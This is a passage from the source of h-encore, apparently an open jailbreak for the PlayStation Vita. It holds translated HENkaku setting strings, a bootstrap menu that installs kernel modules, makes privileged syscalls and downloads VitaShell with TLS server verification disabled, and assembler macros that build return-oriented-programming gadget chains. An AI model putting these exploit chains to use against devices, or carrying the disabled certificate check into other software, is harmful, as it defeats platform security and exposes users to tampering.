366 | // by GrayJack & haouingvalt & menelkir & JuniorPassos
367 | language_container_t language_portuguese_br = {
368 |   L"Configurações do HENkaku",
369 |   L"Habilitar falsificação da PSN",
370 |   L"Habilitar aplicativos inseguros",
371 |   L"Aplicativos inseguros podem danificar o seu aparelho permanentemente caso sejam usados ou configurados incorretamente, ou até mesmo maliciosos.\nPor favor, tenha cuidado ao instalá-los.",
372 |   L"Habilitar falsificação de versão",
373 |   L"Versão falsificada",
374 |   L"Ação do botão ○",
375 |   L"Entrar",
376 |   L"Cancelar",
377 |   L"Recarregue o arquivo config.txt do taiHEN",
378 |   L"O arquivo config.txt do taiHEN foi recarregado com sucesso.",
379 |   L"Reiniciar o dispositivo",
380 |   L"Baixar conteúdo",
381 |   L"Desassociar o cartão de memória",
382 |   L"ux0:id.dat foi deletado. Agora este cartão de memória pode ser usado em qualquer Vita.",
383 |   L"Falha ao montar ux0. O cartão de memória está inserido?",
384 | };
385 | 
386 | // by molecule
387 | language_container_t language_english_gb = {
388 |   L"HENkaku Settings",
389 |   L"Enable PSN spoofing",
390 |   L"Enable Unsafe Homebrew",
391 |   L"Unsafe homebrews can damage your device permanently, if they are misused, misconfigured, or malicious.\nPlease take caution when installing them.",
392 |   L"Enable Version Spoofing",
393 |   L"Spoofed Version",
394 |   L"○ Button Behaviour",
395 |   L"Enter",
396 |   L"Cancel",
397 |   L"Reload taiHEN config.txt",
398 |   L"taiHEN config.txt has been successfully reloaded.",
399 |   L"Reboot Device",
400 |   L"Content Downloader",
401 |   L"Unlink Memory Card",
402 |   L"ux0:id.dat has been deleted. This memory card can now be used on any Vita.",
403 |   L"Failed to mount ux0. Is a memory card inserted?",
404 | };
405 | 
406 | // by Chronicl3
407 | language_container_t language_turkish = {
408 |   L"HENkaku Ayarları",
409 |   L"PSN spoofing Etkinleştir",
410 |   L"Yabancı Uygulamalara İzin Ver ",
411 |   L"Bilinmeyen kaynaklardan uygulama yüklerken dikkatli olunuz.\nKötü niyetli,yanlış yapılandırılmış uygulamalar cihazınıza kalıcı zararlar verebilir.",
412 |   L"Versiyon Spoofing Etkinleştir",
413 |   L"Spoofed Versiyon",
414 |   L"○ Düğmesi Davranışı",
415 |   L"Gir",
416 |   L"İptal",
417 |   L"taiHEN config.txt'yi yeniden yükle",
418 |   L"taiHEN config.txt başarılı bir şekilde yeniden yüklendi.",
419 |   L"Cihazı yeniden başlat",
420 |   L"İçerik İndiricisi",
421 |   L"Hafıza Kartı Bağlantısını Kaldır",
422 |   L"ux0:id.dat silindi.Bu hafıza kartı şuan herhangi bir vita da kullanılabilir.",
423 |   L"ux0 dizin okuma başarısız oldu.Hafıza kartınız takılı mı?",
424 | };
425 | 
426 | #endif // LANGUAGE_HEADER
427 | 


--------------------------------------------------------------------------------
/bootstrap/bootstrap.c:
--------------------------------------------------------------------------------
  1 | /* bootstrap.c -- h-encore bootstrap menu
  2 |  *
  3 |  * Copyright (C) 2018 TheFloW
  4 |  *
  5 |  * This software may be modified and distributed under the terms
  6 |  * of the MIT license.  See the LICENSE file for details.
  7 |  */
  8 | 
  9 | #include <vitasdk.h>
 10 | #include "pspdebug.h"
 11 | 
 12 | #define WHITE 0xFFFFFFFF
 13 | #define AZURE 0xFFFF7F00
 14 | 
 15 | #define printf psvDebugScreenPrintf
 16 | 
 17 | #define VITASHELL_BASE_ADDRESS "https://raw.githubusercontent.com/TheOfficialFloW/VitaShell/master/release"
 18 | 
 19 | #define INCLUDE_EXTERN_RESOURCE(name) extern unsigned char _binary_res_##name##_start; extern unsigned char _binary_res_##name##_size; \
 20 | 
 21 | INCLUDE_EXTERN_RESOURCE(taihen_skprx);
 22 | INCLUDE_EXTERN_RESOURCE(henkaku_skprx);
 23 | INCLUDE_EXTERN_RESOURCE(henkaku_suprx);
 24 | 
 25 | const char taihen_config_recovery_header[] =
 26 |   "# This file is used as an alternative if ux0:tai/config.txt is not found.\n";
 27 | 
 28 | const char taihen_config_header[] =
 29 |   "# For users plugins, you must refresh taiHEN from HENkaku Settings for\n"
 30 |   "# changes to take place.\n"
 31 |   "# For kernel plugins, you must reboot for changes to take place.\n";
 32 | 
 33 | const char taihen_config[] =
 34 |   "*KERNEL\n"
 35 |   "# henkaku.skprx is hard-coded to load and is not listed here\n"
 36 |   "*main\n"
 37 |   "# main is a special titleid for SceShell\n"
 38 |   "ur0:tai/henkaku.suprx\n"
 39 |   "*NPXS10015\n"
 40 |   "# this is for modifying the version string\n"
 41 |   "ur0:tai/henkaku.suprx\n"
 42 |   "*NPXS10016\n"
 43 |   "# this is for modifying the version string in settings widget\n"
 44 |   "ur0:tai/henkaku.suprx\n";
 45 | 
 46 | enum Items {
 47 |   EXIT,
 48 |   INSTALL_HENKAKU,
 49 |   DOWNLOAD_VITASHELL,
 50 |   PERSONALIZE_SAVEDATA,
 51 |   RESET_TAIHEN_CONFIG
 52 | };
 53 | 
 54 | const char *items[] = {
 55 |   "Exit",
 56 |   "Install HENkaku",
 57 |   "Download VitaShell",
 58 |   "Personalize savedata",
 59 |   "Reset taiHEN config.txt"
 60 | };
 61 | 
 62 | #define N_ITEMS (sizeof(items) / sizeof(char *))
 63 | 
 64 | int __attribute__((naked, noinline)) call_syscall(int a1, int a2, int a3, int num) {
 65 |   __asm__ (
 66 |     "mov r12, %0 \n"
 67 |     "svc 0 \n"
 68 |     "bx lr \n"
 69 |     : : "r" (num)
 70 |   );
 71 | }
 72 | 
 73 | int write_file(const char *file, const void *buf, int size) {
 74 |   SceUID fd = sceIoOpen(file, SCE_O_WRONLY | SCE_O_CREAT | SCE_O_TRUNC, 0777);
 75 |   if (fd < 0)
 76 |     return fd;
 77 | 
 78 |   int written = sceIoWrite(fd, buf, size);
 79 | 
 80 |   sceIoClose(fd);
 81 |   return written;
 82 | }
 83 | 
 84 | int exists(const char *path) {
 85 |   SceIoStat stat;
 86 | 
 87 |   if (sceIoGetstat(path, &stat) < 0)
 88 |     return 0;
 89 |   else
 90 |     return 1;
 91 | }
 92 | 
 93 | int load_sce_paf() {
 94 |   static uint32_t argp[] = { 0x400000, 0xEA60, 0x40000, 0, 0 };
 95 | 
 96 |   int result = -1;
 97 | 
 98 |   uint32_t buf[4];
 99 |   buf[0] = sizeof(buf);
100 |   buf[1] = (uint32_t)&result;
101 |   buf[2] = -1;
102 |   buf[3] = -1;
103 | 
104 |   return sceSysmoduleLoadModuleInternalWithArg(SCE_SYSMODULE_INTERNAL_PAF, sizeof(argp), argp, buf);
105 | }
106 | 
107 | int unload_sce_paf() {
108 |   uint32_t buf = 0;
109 |   return sceSysmoduleUnloadModuleInternalWithArg(SCE_SYSMODULE_INTERNAL_PAF, 0, NULL, &buf);
110 | }
111 | 
112 | int promote_app(const char *path) {
113 |   int res;
114 | 
115 |   load_sce_paf();
116 | 
117 |   res = sceSysmoduleLoadModuleInternal(SCE_SYSMODULE_INTERNAL_PROMOTER_UTIL);
118 |   if (res < 0)
119 |     return res;
120 | 
121 |   res = scePromoterUtilityInit();
122 |   if (res < 0)
123 |     return res;
124 | 
125 |   res = scePromoterUtilityPromotePkgWithRif(path, 1);
126 |   if (res < 0)
127 |     return res;
128 | 
129 |   res = scePromoterUtilityExit();
130 |   if (res < 0)
131 |     return res;
132 | 
133 |   res = sceSysmoduleUnloadModuleInternal(SCE_SYSMODULE_INTERNAL_PROMOTER_UTIL);
134 |   if (res < 0)
135 |     return res;
136 | 
137 |   unload_sce_paf();
138 | 
139 |   return res;
140 | }
141 | 
142 | int remove(const char *path) {
143 |   SceUID dfd = sceIoDopen(path);
144 |   if (dfd >= 0) {
145 |     int res = 0;
146 | 
147 |     do {
148 |       SceIoDirent dir;
149 |       sceClibMemset(&dir, 0, sizeof(SceIoDirent));
150 | 
151 |       res = sceIoDread(dfd, &dir);
152 |       if (res > 0) {
153 |         char new_path[256];
154 |         sceClibSnprintf(new_path, sizeof(new_path), "%s/%s", path, dir.d_name);
155 |         res = remove(new_path);
156 |       }
157 |     } while (res > 0);
158 | 
159 |     sceIoDclose(dfd);
160 | 
161 |     return sceIoRmdir(path);
162 |   }
163 | 
164 |   return sceIoRemove(path);
165 | }
166 | 
167 | int download(const char *src, const char *dst) {
168 |   int ret;
169 |   int statusCode;
170 |   int tmplId = -1, connId = -1, reqId = -1;
171 |   SceUID fd = -1;
172 | 
173 |   ret = sceHttpCreateTemplate("h-encore/1.00 libhttp/1.1", SCE_HTTP_VERSION_1_1, SCE_TRUE);
174 |   if (ret < 0)
175 |     goto ERROR_EXIT;
176 | 
177 |   tmplId = ret;
178 | 
179 |   ret = sceHttpCreateConnectionWithURL(tmplId, src, SCE_TRUE);
180 |   if (ret < 0)
181 |     goto ERROR_EXIT;
182 | 
183 |   connId = ret;
184 | 
185 |   ret = sceHttpCreateRequestWithURL(connId, SCE_HTTP_METHOD_GET, src, 0);
186 |   if (ret < 0)
187 |     goto ERROR_EXIT;
188 | 
189 |   reqId = ret;
190 | 
191 |   ret = sceHttpSendRequest(reqId, NULL, 0);
192 |   if (ret < 0)
193 |     goto ERROR_EXIT;
194 | 
195 |   ret = sceHttpGetStatusCode(reqId, &statusCode);
196 |   if (ret < 0)
197 |     goto ERROR_EXIT;
198 | 
199 |   if (statusCode == 200) {
200 |     uint8_t buf[4096];
201 |     uint64_t size = 0;
202 |     uint32_t value = 0;
203 | 
204 |     ret = sceHttpGetResponseContentLength(reqId, &size);
205 |     if (ret < 0)
206 |       goto ERROR_EXIT;
207 | 
208 |     ret = sceIoOpen(dst, SCE_O_WRONLY | SCE_O_CREAT | SCE_O_TRUNC, 6);
209 |     if (ret < 0)
210 |       goto ERROR_EXIT;
211 | 
212 |     fd = ret;
213 | 
214 |     int x = psvDebugScreenGetX();
215 |     int y = psvDebugScreenGetY();
216 | 
217 |     while (1) {
218 |       int read = sceHttpReadData(reqId, buf, sizeof(buf));
219 | 
220 |       if (read < 0) {
221 |         ret = read;
222 |         break;
223 |       }
224 | 
225 |       if (read == 0)
226 |         break;
227 | 
228 |       int written = sceIoWrite(fd, buf, read);
229 | 
230 |       if (written < 0) {
231 |         ret = written;
232 |         break;
233 |       }
234 | 
235 |       value += read;
236 | 
237 |       printf("%d%%", (int)((value * 100) / (uint32_t)size));
238 |       psvDebugScreenSetXY(x, y);
239 |     }
240 |   }
241 | 
242 | ERROR_EXIT:
243 |   if (fd >= 0)
244 |     sceIoClose(fd);
245 | 
246 |   if (reqId >= 0)
247 |     sceHttpDeleteRequest(reqId);
248 | 
249 |   if (connId >= 0)
250 |     sceHttpDeleteConnection(connId);
251 | 
252 |   if (tmplId >= 0)
253 |     sceHttpDeleteTemplate(tmplId);
254 | 
255 |   return ret;
256 | }
257 | 
258 | void init_net() {
259 |   static char memory[16 * 1024];
260 | 
261 |   sceSysmoduleLoadModule(SCE_SYSMODULE_NET);
262 |   sceSysmoduleLoadModule(SCE_SYSMODULE_HTTPS);
263 | 
264 |   SceNetInitParam param;
265 |   param.memory = memory;
266 |   param.size = sizeof(memory);
267 |   param.flags = 0;
268 | 
269 |   sceNetInit(&param);
270 |   sceNetCtlInit();
271 | 
272 |   sceSslInit(300 * 1024);
273 |   sceHttpInit(40 * 1024);
274 | 
275 |   sceHttpsDisableOption(SCE_HTTPS_FLAG_SERVER_VERIFY);
276 | }
277 | 
278 | void finish_net() {
279 |   sceSslTerm();
280 |   sceHttpTerm();
281 |   sceNetCtlTerm();
282 |   sceNetTerm();
283 |   sceSysmoduleUnloadModule(SCE_SYSMODULE_HTTPS);
284 |   sceSysmoduleUnloadModule(SCE_SYSMODULE_NET);
285 | }
286 | 
287 | typedef struct {
288 |   char *src;
289 |   char *dst;
290 | } DownloadSrcDst;
291 | 
292 | DownloadSrcDst vitashell_src_dst[] = {
293 |   { "eboot.bin",    "ux0:temp/app/eboot.bin" },
294 |   { "icon0.png",    "ux0:temp/app/sce_sys/icon0.png" },
295 |   { "param.sfo",    "ux0:temp/app/sce_sys/param.sfo" },
296 |   { "bg.png",       "ux0:temp/app/sce_sys/livearea/contents/bg.png" },
297 |   { "startup.png",  "ux0:temp/app/sce_sys/livearea/contents/startup.png" },
298 |   { "template.xml", "ux0:temp/app/sce_sys/livearea/contents/template.xml" },
299 |   { "head.bin",     "ux0:temp/app/sce_sys/package/head.bin" },
300 | };
301 | 
302 | int download_vitashell() {
303 |   char url[256];
304 |   int res;
305 |   int i;
306 | 
307 |   init_net();
308 | 
309 |   remove("ux0:patch/VITASHELL");
310 | 
311 |   sceIoMkdir("ux0:VitaShell", 0777);
312 |   sceIoMkdir("ux0:temp", 6);
313 |   sceIoMkdir("ux0:temp/app", 6);
314 |   sceIoMkdir("ux0:temp/app/sce_sys", 6);
315 |   sceIoMkdir("ux0:temp/app/sce_sys/livearea", 6);
316 |   sceIoMkdir("ux0:temp/app/sce_sys/livearea/contents", 6);
317 |   sceIoMkdir("ux0:temp/app/sce_sys/package", 6);
318 | 
319 |   for (i = 0; i < sizeof(vitashell_src_dst) / sizeof(DownloadSrcDst); i++) {
320 |     printf(" > Downloading %s...", vitashell_src_dst[i].src);
321 |     sceClibSnprintf(url, sizeof(url), "%s/%s", VITASHELL_BASE_ADDRESS, vitashell_src_dst[i].src);
322 |     res = download(url, vitashell_src_dst[i].dst);
323 |     printf("\n");
324 |     if (res < 0)
325 |       return res;
326 |   }
327 | 
328 |   printf(" > Installing application...\n");
329 |   res = promote_app("ux0:temp/app");
330 |   if (res < 0)
331 |     return res;
332 | 
333 |   finish_net();
334 | 
335 |   return 0;
336 | }
337 | 
338 | int install_henkaku() {
339 |   int res;
340 | 
341 |   sceIoMkdir("ur0:tai", 6);
342 | 
343 |   res = write_file("ur0:tai/taihen.skprx", (void *)&_binary_res_taihen_skprx_start, (int)&_binary_res_taihen_skprx_size);
344 |   if (res < 0)
345 |     return res;
346 |   res = write_file("ur0:tai/henkaku.skprx", (void *)&_binary_res_henkaku_skprx_start, (int)&_binary_res_henkaku_skprx_size);
347 |   if (res < 0)
348 |     return res;
349 |   res = write_file("ur0:tai/henkaku.suprx", (void *)&_binary_res_henkaku_suprx_start, (int)&_binary_res_henkaku_suprx_size);
350 |   if (res < 0)
351 |     return res;
352 | 
353 |   return 0;
354 | }
355 | 
356 | int write_taihen_config(const char *path, int recovery) {
357 |   int fd;
358 | 
359 |   // write default config
360 |   sceIoRemove(path);
361 |   fd = sceIoOpen(path, SCE_O_TRUNC | SCE_O_CREAT | SCE_O_WRONLY, 6);
362 |   if (recovery) {
363 |     sceIoWrite(fd, taihen_config_recovery_header, sizeof(taihen_config_recovery_header) - 1);
364 |   }
365 |   sceIoWrite(fd, taihen_config_header, sizeof(taihen_config_header) - 1);
366 |   sceIoWrite(fd, taihen_config, sizeof(taihen_config) - 1);
367 |   sceIoClose(fd);
368 | 
369 |   return 0;
370 | }
371 | 
372 | int reset_taihen_config() {
373 |   sceIoMkdir("ux0:tai", 6);
374 |   sceIoMkdir("ur0:tai", 6);
375 | 
376 |   write_taihen_config("ux0:tai/config.txt", 0);
377 |   write_taihen_config("ur0:tai/config.txt", 1);
378 | 
379 |   return 0;
380 | }
381 | 
382 | int personalize_savedata(int syscall_id) {
383 |   int res;
384 |   int fd;
385 |   uint64_t aid;
386 | 
387 |   res = call_syscall(sceKernelGetProcessId(), 0, 0, syscall_id + 4);
388 |   if (res < 0 && res != 0x80800003)
389 |     return res;
390 | 
391 |   res = sceRegMgrGetKeyBin("/CONFIG/NP", "account_id", &aid, sizeof(uint64_t));
392 |   if (res < 0)
393 |     return res;
394 | 
395 |   fd = sceIoOpen("savedata0:sce_sys/param.sfo", SCE_O_RDWR, 0777);
396 |   if (fd < 0)
397 |     return fd;
398 | 
399 |   sceIoLseek(fd, 0xe4, SCE_SEEK_SET);
400 |   sceIoWrite(fd, &aid, sizeof(uint64_t));
401 |   sceIoClose(fd);
402 | 
403 |   return 0;
404 | }
405 | 
406 | int enter_cross = 0;
407 | uint32_t old_buttons = 0, current_buttons = 0, pressed_buttons = 0;
408 | 
409 | void read_pad(void) {
410 |   SceCtrlData pad;
411 |   sceCtrlPeekBufferPositive(0, &pad, 1);
412 | 
413 |   old_buttons = current_buttons;
414 |   current_buttons = pad.buttons;
415 |   pressed_buttons = current_buttons & ~old_buttons;
416 | }
417 | 
418 | int wait_confirm(const char *msg) {
419 |   printf(msg);
420 |   printf(" > Press %c to confirm or %c to decline.\n", enter_cross ? 'X' : 'O', enter_cross ? 'O' : 'X');
421 | 
422 |   while (1) {
423 |     read_pad();
424 | 
425 |     if ((enter_cross && pressed_buttons & SCE_CTRL_CROSS) ||
426 |         (!enter_cross && pressed_buttons & SCE_CTRL_CIRCLE)) {
427 |       return 1;
428 |     }
429 | 
430 |     if ((enter_cross && pressed_buttons & SCE_CTRL_CIRCLE) ||
431 |         (!enter_cross && pressed_buttons & SCE_CTRL_CROSS)) {
432 |       return 0;
433 |     }
434 | 
435 |     sceKernelDelayThread(10 * 1000);
436 |   }
437 | 
438 |   return 0;
439 | }
440 | 
441 | void print_result(int res) {
442 |   if (res < 0)
443 |     printf(" > Failed! 0x%08X\n", res);
444 |   else
445 |     printf(" > Success!\n");
446 |   sceKernelDelayThread((res < 0) ? (5 * 1000 * 1000) : (1 * 1000 * 1000));
447 | }
448 | 
449 | int print_menu(int sel) {
450 |   int i;
451 | 
452 |   psvDebugScreenSetXY(0, 0);
453 |   psvDebugScreenSetTextColor(AZURE);
454 |   printf("\n h-encore bootstrap menu\n\n");
455 | 
456 |   for (i = 0; i < N_ITEMS; i++) {
457 |     psvDebugScreenSetTextColor(sel == i ? AZURE : WHITE);
458 |     printf(" [%c] %s\n", sel == i ? '*' : ' ', items[i]);
459 |   }
460 | 
461 |   printf("\n");
462 | 
463 |   psvDebugScreenSetTextColor(AZURE);
464 |   printf("----------------------------\n\n");
465 | 
466 |   return 0;
467 | }
468 | 
469 | void _start() __attribute__ ((weak, alias ("module_start")));
470 | int module_start(SceSize args, void *argp) {
471 |   SceAppUtilInitParam init_param;
472 |   SceAppUtilBootParam boot_param;
473 |   int syscall_id;
474 |   int enter_button;
475 |   int sel;
476 |   int res;
477 | 
478 |   syscall_id = *(uint16_t *)argp;
479 | 
480 |   sceAppMgrDestroyOtherApp();
481 | 
482 |   sceShellUtilInitEvents(0);
483 |   sceShellUtilLock(SCE_SHELL_UTIL_LOCK_TYPE_PS_BTN);
484 | 
485 |   sceClibMemset(&init_param, 0, sizeof(SceAppUtilInitParam));
486 |   sceClibMemset(&boot_param, 0, sizeof(SceAppUtilBootParam));
487 |   sceAppUtilInit(&init_param, &boot_param);
488 | 
489 |   sceAppUtilSystemParamGetInt(SCE_SYSTEM_PARAM_ID_ENTER_BUTTON, &enter_button);
490 |   enter_cross = enter_button == SCE_SYSTEM_PARAM_ENTER_BUTTON_CROSS;
491 | 
492 |   psvDebugScreenInit();
493 |   psvDebugScreenClearLineDisable();
494 | 
495 |   sel = 0;
496 |   print_menu(sel);
497 | 
498 |   while (1) {
499 |     read_pad();
500 | 
501 |     if (pressed_buttons & SCE_CTRL_UP) {
502 |       if (sel > 0)
503 |         sel--;
504 |       else
505 |         sel = N_ITEMS - 1;
506 | 
507 |       print_menu(sel);
508 |     }
509 | 
510 |     if (pressed_buttons & SCE_CTRL_DOWN) {
511 |       if (sel < N_ITEMS - 1)
512 |         sel++;
513 |       else
514 |         sel = 0;
515 | 
516 |       print_menu(sel);
517 |     }
518 | 
519 |     if ((enter_cross && pressed_buttons & SCE_CTRL_CROSS) ||
520 |         (!enter_cross && pressed_buttons & SCE_CTRL_CIRCLE)) {
521 |       psvDebugScreenSetTextColor(AZURE);
522 | 
523 |       if (sel == EXIT) {
524 |         printf(" > Exiting...\n");
525 |         sceKernelDelayThread(500 * 1000);
526 |         break;
527 |       } else if (sel == INSTALL_HENKAKU) {
528 |         printf(" > Installing HENkaku...\n");
529 |         sceKernelDelayThread(500 * 1000);
530 |         res = install_henkaku();
531 |       } else if (sel == DOWNLOAD_VITASHELL) {
532 |         printf(" > Downloading VitaShell...\n");
533 |         sceKernelDelayThread(500 * 1000);
534 |         res = download_vitashell();
535 |       } else if (sel == PERSONALIZE_SAVEDATA) {
536 |         printf(" > Personalizing savedata...\n");
537 |         sceKernelDelayThread(500 * 1000);
538 |         res = personalize_savedata(syscall_id);
539 |       } else if (sel == RESET_TAIHEN_CONFIG) {
540 |         if (wait_confirm(" > Are you sure you want to reset taiHEN config.txt?\n")) {
541 |           printf(" > Resetting taiHEN config.txt...\n");
542 |           sceKernelDelayThread(500 * 1000);
543 |           res = reset_taihen_config();
544 |         } else {
545 |           sel = 0;
546 |           psvDebugScreenClear();
547 |           print_menu(sel);
548 |           continue;
549 |         }
550 |       }
551 | 
552 |       print_result(res);
553 | 
554 |       sel = 0;
555 |       psvDebugScreenClear();
556 |       print_menu(sel);
557 |     }
558 | 
559 |     sceKernelDelayThread(10 * 1000);
560 |   }
561 | 
562 |   sceShellUtilUnlock(SCE_SHELL_UTIL_LOCK_TYPE_PS_BTN);
563 | 
564 |   // Install HENkaku if any of the modules are missing
565 |   if (!exists("ur0:tai/henkaku.suprx") ||
566 |       !exists("ur0:tai/henkaku.skprx") ||
567 |       !exists("ur0:tai/taihen.skprx")) {
568 |     printf(" > Installing HENkaku...\n");
569 |     sceKernelDelayThread(500 * 1000);
570 |     res = install_henkaku();
571 |     print_result(res);
572 |   }
573 | 
574 |   // Write taiHEN configs if both at ur0: and ux0: don't exist
575 |   if (!exists("ur0:tai/config.txt") &&
576 |       !exists("ux0:tai/config.txt")) {
577 |     printf(" > Writing taiHEN config.txt...\n");
578 |     sceKernelDelayThread(500 * 1000);
579 |     res = reset_taihen_config();
580 |     print_result(res);
581 |   }
582 | 
583 |   // Remove pkg patches
584 |   res = call_syscall(0, 0, 0, syscall_id + 1);
585 | 
586 |   if (res >= 0) {
587 |     // Start HENkaku
588 |     res = call_syscall(0, 0, 0, syscall_id + 0);
589 |   } else {
590 |     // Remove sig patches
591 |     call_syscall(0, 0, 0, syscall_id + 2);
592 |   }
593 | 
594 |   // Clean up
595 |   call_syscall(0, 0, 0, syscall_id + 3);
596 | 
597 |   if (res < 0 && res != 0x8002D013 && res != 0x8002D017) {
598 |     printf(" > Failed to load HENkaku! 0x%08X\n", res);
599 |     printf(" > Please relaunch the exploit and select 'Install HENkaku'.\n");
600 |     sceKernelDelayThread(5 * 1000 * 1000);
601 |   }
602 | 
603 |   sceKernelExitProcess(0);
604 |   return 0;
605 | }
606 | 


--------------------------------------------------------------------------------
/include/macros.S:
--------------------------------------------------------------------------------
  1 | /* macros.S -- rop macros
  2 |  *
  3 |  * Copyright (C) 2018 TheFloW
  4 |  *
  5 |  * This software may be modified and distributed under the terms
  6 |  * of the MIT license.  See the LICENSE file for details.
  7 |  */
  8 | 
  9 | // *dst = *src + val
 10 | .macro load_add_store dst, src, val
 11 |   add_lv   \src, \val
 12 |   store_rv  ret, \dst
 13 | .endm
 14 | 
 15 | // blx r3
 16 | .macro blx_r3
 17 |   .word blx_r3_add_sp_14_pop_pc            // pc
 18 |   .word 0xDEADBEEF                         // dummy
 19 |   .word 0xDEADBEEF                         // dummy
 20 |   .word 0xDEADBEEF                         // dummy
 21 |   .word 0xDEADBEEF                         // dummy
 22 |   .word 0xDEADBEEF                         // dummy
 23 |   .set lr_okay, 0
 24 | .endm
 25 | 
 26 | // set lr to gadget add_sp_4_pop_pc
 27 | .macro set_lr_to_add_sp_4_pop_pc
 28 |   .if lr_okay == 0
 29 |     .word ldr_r0_sp_add_sp_4_pop_pc        // pc
 30 |     .word pop_pc                           // r0
 31 |     .word blx_r0_add_sp_4_pop_pc           // pc
 32 |   .endif
 33 |   .set lr_okay, 1
 34 | .endm
 35 | 
 36 | // set lr to gadget add_sp_14_pop_pc
 37 | .macro set_lr_to_add_sp_14_pop_pc
 38 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
 39 |   .word pop_pc                             // r0
 40 |   .word blx_r0_add_sp_14_pop_pc            // pc
 41 |   .set lr_okay, 0
 42 | .endm
 43 | 
 44 | // ret = lr
 45 | .macro get_lr
 46 |   .word pop_r3_r5_pc                       // pc
 47 |   .word 0xDEADBEEF                         // r3
 48 |   .word 0                                  // r5
 49 |   .word adcs_r0_lr_r5_lsl_12_pop_pc        // pc
 50 | .endm
 51 | 
 52 | // set r1
 53 | .macro set_r1 a0
 54 |   .word pop_r3_r5_pc                       // pc
 55 |   .word pop_pc                             // r3
 56 |   .word 0xDEADBEEF                         // r5
 57 |   .word pop_r4_pc                          // pc
 58 |   .word \a0                                // r4
 59 |   .word mov_r1_r4_blx_r3                   // pc
 60 |   .set lr_okay, 0
 61 | .endm
 62 | 
 63 | // set r0, r2, ip, sp, lr and pc
 64 | .macro set_r0_r2_ip_sp_lr_pc a0
 65 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
 66 |   .word \a0                                // r0
 67 |   .word ldm_r0_r0_r2_ip_sp_lr_pc           // pc
 68 | .endm
 69 | 
 70 | // *a1 = *a0
 71 | .macro store_lv a0, a1
 72 |   set_lr_to_add_sp_4_pop_pc                // pc
 73 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
 74 |   .word \a0                                // r0
 75 |   .word \a1                                // r1
 76 |   .word 0xDEADBEEF                         // dummy
 77 |   .word ldr_r0_r0_bx_lr                    // pc
 78 |   .word 0xDEADBEEF                         // dummy
 79 |   .word str_r0_r1_add_sp_4_pop_pc          // pc
 80 |   .word 0xDEADBEEF                         // dummy
 81 | .endm
 82 | 
 83 | // *a1 = ret
 84 | .macro store_rv a0, a1
 85 |   set_r1 \a1                               // pc
 86 |   .word str_r0_r1_add_sp_4_pop_pc          // pc
 87 |   .word 0xDEADBEEF                         // dummy
 88 | .endm
 89 | 
 90 | // *a1 = a0
 91 | .macro store_vv a0, a1
 92 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
 93 |   .word \a0                                // r0
 94 |   .word \a1                                // r1
 95 |   .word 0xDEADBEEF                         // dummy
 96 |   .word str_r0_r1_add_sp_4_pop_pc          // pc
 97 |   .word 0xDEADBEEF                         // dummy
 98 | .endm
 99 | 
100 | // ret = ret ^ a1
101 | .macro xor_rv a0, a1
102 |   .word movs_r4_r0_add_sp_c_pop_pc         // pc
103 |   .word 0xDEADBEEF                         // dummy
104 |   .word 0xDEADBEEF                         // dummy
105 |   .word 0xDEADBEEF                         // dummy
106 |   set_lr_to_add_sp_4_pop_pc                // pc
107 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
108 |   .word \a1                                // r0
109 |   .word eors_r4_r0_movt_r0_8103_bx_lr      // pc
110 |   .word 0xDEADBEEF                         // dummy
111 |   .word mov_r0_r4_blx_lr                   // pc
112 |   .word 0xDEADBEEF                         // dummy
113 | .endm
114 | 
115 | // ret = *a0 + a1
116 | .macro add_lv a0, a1
117 |   set_lr_to_add_sp_4_pop_pc                // pc
118 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
119 |   .word \a0                                // r0
120 |   .word \a1                                // r1
121 |   .word 0xDEADBEEF                         // dummy
122 |   .word ldr_r0_r0_bx_lr                    // pc
123 |   .word 0xDEADBEEF                         // dummy
124 |   .word add_r0_r1_add_sp_10_bx_lr          // pc
125 |   .word 0xDEADBEEF                         // dummy
126 |   .word 0xDEADBEEF                         // dummy
127 |   .word 0xDEADBEEF                         // dummy
128 |   .word 0xDEADBEEF                         // dummy
129 |   .word 0xDEADBEEF                         // dummy
130 | .endm
131 | 
132 | // ret = ret + a1
133 | .macro add_rv a0, a1
134 |   call_rv add_r0_r1_add_sp_10_bx_lr, \a0, \a1
135 |   .word 0xDEADBEEF                         // dummy
136 |   .word 0xDEADBEEF                         // dummy
137 |   .word 0xDEADBEEF                         // dummy
138 |   .word 0xDEADBEEF                         // dummy
139 |   .set lr_okay, 0
140 | .endm
141 | 
142 | // ret = ret * a1 + a2
143 | .macro mul_add_rvv, a0, a1, a2
144 |   // Multiply r0 with a1 and save it in r3
145 |   .word pop_r4_pc                          // pc
146 |   .word -(\a1)                             // r4
147 |   .word pop_r3_r5_pc                       // pc
148 |   .word movs_r2_r4_add_sp_8_bx_lr          // r3
149 |   .word 0xDEADBEEF                         // r5
150 |   blx_r3                                   // pc
151 |   .word 0xDEADBEEF                         // dummy
152 |   .word 0xDEADBEEF                         // dummy
153 |   set_r1 muls_r0_r2_r0_subs_r3_r3_r0_bx_lr // pc
154 |   .word pop_r3_r5_pc                       // pc
155 |   .word 0                                  // r3
156 |   .word 0xDEADBEEF                         // r5
157 |   .word blx_r1_add_sp_4_pop_pc             // pc
158 |   .word 0xDEADBEEF                         // dummy
159 | 
160 |   // Move r3 to r1
161 |   .word ldm_sp_r0_r1_add_sp_c_pop_pc       // pc
162 |   .word adds_r1_r1_r3_add_r0_r2_r1_bx_lr   // r0
163 |   .word 0                                  // r1
164 |   .word 0xDEADBEEF                         // dummy
165 |   .word blx_r0_add_sp_4_pop_pc             // pc
166 |   .word 0xDEADBEEF                         // dummy
167 | 
168 |   // Add a2 to r1 and save it in r0
169 |   .word pop_r3_r5_pc                       // pc
170 |   .word add_r0_r1_add_sp_10_bx_lr          // r3
171 |   .word 0xDEADBEEF                         // r5
172 |   .word ldr_r0_sp_add_sp_4_pop_pc          // pc
173 |   .word \a2                                // r0
174 |   blx_r3                                   // pc
175 |   .word 0xDEADBEEF                         // dummy
176 |   .word 0xDEADBEEF                         // dummy
177 |   .word 0xDEADBEEF                         // dummy
178 |   .word 0xDEADBEEF                         // dummy
179 | 
180 |   .set lr_okay, 0
181 | .endm
182 | 
183 | // ret = (ret == a1) ? 1 : 0
184 | .macro cmp_eq_rv a0, a1
185 |   set_r1 \a1                               // pc
186 |   .word pop_r3_r5_pc                       // pc
